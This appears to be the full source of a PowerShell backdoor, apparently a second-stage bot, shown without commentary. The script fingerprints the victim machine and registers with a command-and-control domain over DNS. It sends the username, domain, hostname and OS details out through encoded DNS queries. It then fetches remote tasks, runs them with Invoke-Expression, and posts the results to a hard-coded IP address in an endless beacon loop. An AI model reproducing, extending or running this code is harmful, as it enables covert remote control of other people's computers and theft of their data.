# This section should be ommited as it is present in Stager# =================

1. # This section should be ommited as it is present in Stager
2. # =============================================================================
3. $domains = @("hellobot.fun")
4. function Pick-Domain {
5. Param($DomainList)
6. if ($DomainList.count -eq 1) {
7. return $DomainList
8. }
9. return $DomainList[(Get-Random -Maximum ([array]$DomainList).count)]
10. }
11.  
12. function Identify-Machine() {
13. $serial = Get-WmiObject Win32_BIOS | Select -ExpandProperty SerialNumber
14. $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
15. $hash = ($md5.ComputeHash([system.Text.Encoding]::UTF8.GetBytes($serial)) | foreach { $_.ToString("X2") }) -join ""
16.  
17. return $hash.Substring(0, 10)
18. }
19.  
20. function Try-Domains {
21. [CmdletBinding()]
22. param([Parameter(ValueFromPipeline)]$DomainList, [Parameter()][scriptblock]$Action)
23.  
24. if ($DomainList.count -eq 0) {
25. Throw "No domains"
26. }
27. $domain = Pick-Domain $DomainList
28. try {
29. return $Action.Invoke($domain)
30. } Catch {
31. return Try-Domains ($DomainList | Where-Object { $_ –ne $domain }) $Action
32. }
33. }
34.  
35. function Do-DNS {
36. [CmdletBinding()]
37. param([Parameter()]$dns, [Parameter()]$type)
38.  
39. Write-Debug "[DNS] (${type}) ==> ${dns}"
40. $data = Resolve-DnsName -Type $type $dns -ErrorAction Stop -DnsOnly -Debug:$false -Server 212.32.242.146
41. return $data
42. }
43.  
44. function Do-DNS-TXT {
45. [CmdletBinding()]
46. param([Parameter()]$dns, [Parameter()]$type)
47.  
48. return (Do-DNS $dns $type | Select -ExpandProperty Strings) -join ''
49. }
50.  
51. function Decode-String {
52. [CmdletBinding()]
53. param([Parameter(ValueFromPipeline)]$Code)
54. Write-Debug "Decode-Str: $Code"
55. $gzipBytes = [System.Convert]::FromBase64String($Code)
56. $codeBytes = Get-DecompressedByteArray($gzipBytes)
57. return [system.Text.Encoding]::UTF8.GetString($codeBytes)
58. }
59.  
60. # =============================================================================
61. function Get-CompressedByteArray {
62. [CmdletBinding()]
63. Param (
64. [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
65. [byte[]] $byteArray = $(Throw("-byteArray is required"))
66. )
67. Process {
68. Write-Verbose "Get-CompressedByteArray"
69. [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
70. $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
71. $gzipStream.Write( $byteArray, 0, $byteArray.Length )
72. $gzipStream.Close()
73. $output.Close()
74. $tmp = $output.ToArray()
75. Write-Output $tmp
76. }
77. }
78.  
79. function Get-DecompressedByteArray {
80.  
81. [CmdletBinding()]
82. Param (
83. [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
84. [byte[]] $byteArray = $(Throw("-byteArray is required"))
85. )
86. Process {
87. Write-Verbose "Get-DecompressedByteArray"
88. $input = New-Object System.IO.MemoryStream( , $byteArray )
89. $output = New-Object System.IO.MemoryStream
90. $gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
91. $gzipStream.CopyTo( $output )
92. $gzipStream.Close()
93. $input.Close()
94. [byte[]] $byteOutArray = $output.ToArray()
95. Write-Output $byteOutArray
96. }
97. }
98.  
99. function Encode-Base58{
100. [CmdletBinding()]
101. param([Parameter()]$bytes)
102.  
103. $base58digits = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
104.  
105. # get big int representation
106. $dBig = New-Object System.Numerics.BigInteger 0
107. $bytes | %{ $dBig = $dBig * 256 + $_ }
108.  
109. # combine into string
110. $result = [System.String]::Empty
111. while ($dBig -gt 0) {
112. $rem = $dBig % 58
113. $dBig /= 58
114. $result = $base58digits[$rem] + $result
115. }
116. foreach ($b in $bytes) {
117. if ($b -ne 0) { break }
118. $result = '1' + $result
119. }
120.  
121. return $result
122. }
123.  
124. function Encode-Data{
125. [CmdletBinding()]
126. param([Parameter()]$data)
127. $bytes = [system.Text.Encoding]::UTF8.GetBytes($data)
128. $gzipbytes = Get-CompressedByteArray $bytes
129. $b58bytes = Encode-Base58 $gzipbytes
130. $split = ([regex]::matches($b58bytes, '.{1,63}') | %{$_.value}) -join '.'
131.  
132. return $split
133. }
134.  
135. function Encode-HTTP-Data {
136. [CmdletBinding()]
137. param([Parameter()]$data)
138.  
139. $bytes = [system.Text.Encoding]::UTF8.GetBytes($data)
140. $gzipbytes = Get-CompressedByteArray $bytes
141. return [System.Convert]::ToBase64String($gzipbytes)
142. }
143.  
144. # =============================================================================
145.  
146. function Register-Bot {
147. [CmdletBinding()]
148. param([Parameter()]$DomainList)
149.  
150. $regSuccess = Try-Domains $DomainList {
151. return Do-DNS-TXT "$(Identify-Machine).add.$domain" TXT
152. }
153. if ($regSuccess -ne "1") {
154. throw "Bad registration"
155. }
156. }
157.  
158. function Execute-Dict {
159. [CmdletBinding()]
160. param([Parameter(ValueFromPipeline)]$Data)
161.  
162. $output = @{}
163. $Data.GetEnumerator() | % {
164.  
165. $val = try { Exec-Timeout $_.value } catch { "Failure" }
166. $output[$_.key] = $val
167. }
168. return $output
169. }
170.  
171. function Do-Bad-Job {
172. [CmdletBinding()]
173. param([Parameter()]$DomainList, [Parameter()]$Data)
174.  
175. Execute-Dict $Data | %{$_.GetEnumerator()} | %{
176. try {
177. $letter = $_.key
178. $sdata = $_.value
179. $enc = Encode-Data $sdata
180. Write-Debug "[General data] ${letter}: ${sdata} => ${enc}"
181.  
182. Try-Domains $DomainList {
183. $response = Do-DNS "${enc}.${letter}.$(Identify-Machine).i.$domain" A | Select -ExpandProperty IPAddress
184. if ($response -ne '1.1.1.1') {
185. Throw 'Bad response 3'
186. }
187. }
188. } catch {
189. Write-Debug "[General data] Unable to send ${letters}"
190. }
191. }
192.  
193. Write-Debug "[General data] Complete"
194. }
195. function Read-Mode {
196. [CmdletBinding()]
197. param([Parameter()]$DomainList)
198.  
199. return Try-Domains $DomainList {
200. return Do-DNS-TXT "$(Identify-Machine).mx1.$domain" TXT
201. }
202. }
203.  
204. function Get-WWW-PS {
205. [CmdletBinding()]
206. param([Parameter()]$DomainList)
207. return Try-Domains $DomainList {
208. Write-Host $domain
209. return Do-DNS-TXT "$(Identify-Machine).www.$domain" TXT | Decode-String
210. }
211. }
212.  
213. function Send-HTTP-Data {
214. [CmdletBinding()]
215. param([Parameter()]$DomainList, [Parameter()]$data)
216.  
217. # encode data
218. $encdata = Encode-HTTP-Data $data
219.  
220. $myData = @{"hwid" = $(Identify-Machine); "data" = $data | ConvertTo-Json -Depth 4}
221. $myData["data"] | Out-String
222. try {
223. Invoke-WebRequest -Uri "http://212.32.242.146/index.php?r=bot-result%2Findex" -Body $myData -Method POST
224. #Invoke-WebRequest -UseBasicParsing http://212.32.242.146/index.php?r=bot-result%2Findex -ContentType "application/json" -Method POST -Body "{ 'hwid':$myData["hwid"], 'data':$myData["data"]}"
225. } catch {
226. Write-Host "StatusCode:" $_.Exception.Response.StatusCode.value__
227. Write-Host "StatusDescription:" $_.Exception.Response.StatusDescription
228. }
229.  
230. #return Try-Domains $DomainList {
231. # Write-Debug "[HTTP] ===> http://$(Identify-Machine).http.$domain"
232. # #return Invoke-WebRequest -Uri "http://$(Identify-Machine).http.$domain" -Body $data -Method POST
233. # return Invoke-WebRequest -Uri "http://212.32.242.146/index.php?r=bot-result%2Findex" -Body $myData -Method POST
234. #}
235. }
236.  
237. function Main-Loop {
238. [CmdletBinding()]
239. param([Parameter()]$DomainList)
240. Write-Host "Main start"
241. while (1) {
242. # get mode
243. $mode = Read-Mode $domains
244. $interval = 0
245. switch ($mode){
246. '3' { break }
247. '0' { $interval = 30*60 }
248. '1' { $interval = 12*60*60 }
249. }
250. Write-Host "Interval mode: $mode"
251. try {
252. # NO www=exit HANDLING
253.  
254. $data = Get-Tasks $DomainList
255. $taskType = ''
256. $data_new = @{}
257. (ConvertFrom-Json $data).psobject.properties | Foreach { if ($_.Name -ne 'taskType' ) { $data_new[$_.Name] = $_.Value} else {$taskType = $_.Value} }
258.  
259. $data = Execute-Dict $data_new
260. $data['taskType'] = $taskType
261. Write-Debug "[Main-Loop] Data: ${data}"
262.  
263. # convert to dictionary if not a dictionary
264. if ($data -isnot [System.Collections.IDictionary]){
265. $data = @{'response'=$data}
266. }
267.  
268. # if not OK code -- exception
269. Send-HTTP-Data $DomainList $data
270. } catch {
271. Write-Debug "[Main-Loop] Execution crashed"
272. Write-Host $Error[0]
273. }
274. Write-Debug "[Main-Loop] Start sleeping for ${interval}s"
275. Start-Sleep -s $interval
276. }
277. }
278.  
279. function Exec-Timeout {
280. [CmdletBinding()]
281. param([Parameter(ValueFromPipeline)][string]$command)
282. $timeoutSeconds = 10
283. $val = "failure"
284. Write-Host $command
285. $code = {
286. param($c)
287. Invoke-Expression $c
288. }
289.  
290. $j = Start-Job -ScriptBlock $code -ArgumentList $command
291. if (Wait-Job $j -Timeout $timeoutSeconds) {
292. $val = Receive-Job $j
293. }
294. Remove-Job -force $j
295. return $val
296. }
297.  
298. function Get-Tasks {
299. [CmdletBinding()]
300. param([Parameter(ValueFromPipeline)]$DomainList)
301. $stage = ''
302. $domain = Pick-Domain $DomainList
303. $partStage = 0
304. $dns = "$(Identify-Machine).www.$partStage.$domain"
305. $dnsResponseA = Do-Dns $dns A | Select -ExpandProperty IPAddress
306. while ($dnsResponseA -ne '0.0.0.0') {
307. $bigInt = Ip-To-Long $dnsResponseA
308. $bin = To-Bin-Number $bigInt
309.  
310. $dnsResponseTXT = (Do-DNS $dns TXT | Select -ExpandProperty Strings) -join ''
311. $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
312. $hash = ($md5.ComputeHash([system.Text.Encoding]::UTF8.GetBytes($dnsResponseTXT)) | foreach { $_.ToString("X2") }) -join ""
313. $txtHex = [string]$hash[0] + [string]$hash[1] + [string]$hash[2] + [string]$hash[3] + [string]$hash[4] + [string]$hash[5] + [string]$hash[6] + [string]$hash[7]
314. $txtInt = Hex-To-Int $txtHex
315. $txtBin = To-Bin-Number $txtInt
316.  
317. if ([string]$bin -eq [string]$txtBin) {
318. $stage += $dnsResponseTXT
319. $domain = Pick-Domain $DomainList
320. $partStage++
321. }
322. $dns = "$(Identify-Machine).www.$partStage.$domain"
323. $dnsResponseA = Do-Dns $dns A | Select -ExpandProperty IPAddress
324. }
325.  
326. return [string]$stage | Decode-String
327. }
328.  
329.  
330. $baseData = @{
331. 'u'='$env:username'
332. 'd'='$env:userdomain'
333. 'o'='Get-WmiObject Win32_OperatingSystem | Select -ExpandProperty Caption'
334. 'h'='hostname'
335. 'a'='1'
336. 'org'='Get-WmiObject Win32_OperatingSystem | Select -ExpandProperty Organization | %{if ([string]::IsNullOrEmpty($_)) {"NoOrg"} else {$_}}'
337. 'arc'='Get-WmiObject Win32_OperatingSystem | Select -ExpandProperty OSArchitecture'
338. }
339.  
340. try {
341. [Console]::OutputEncoding = [Text.UTF8Encoding]::UTF8
342. } catch {
343. Write-Host $Error[0]
344. }
345. try {
346. # register bot
347. Register-Bot $domains
348. # send data
349. Do-Bad-Job $domains $baseData
350. # enter main loop
351. Main-Loop $domains
352. } catch {
353. Write-Debug $Error[0]
354. }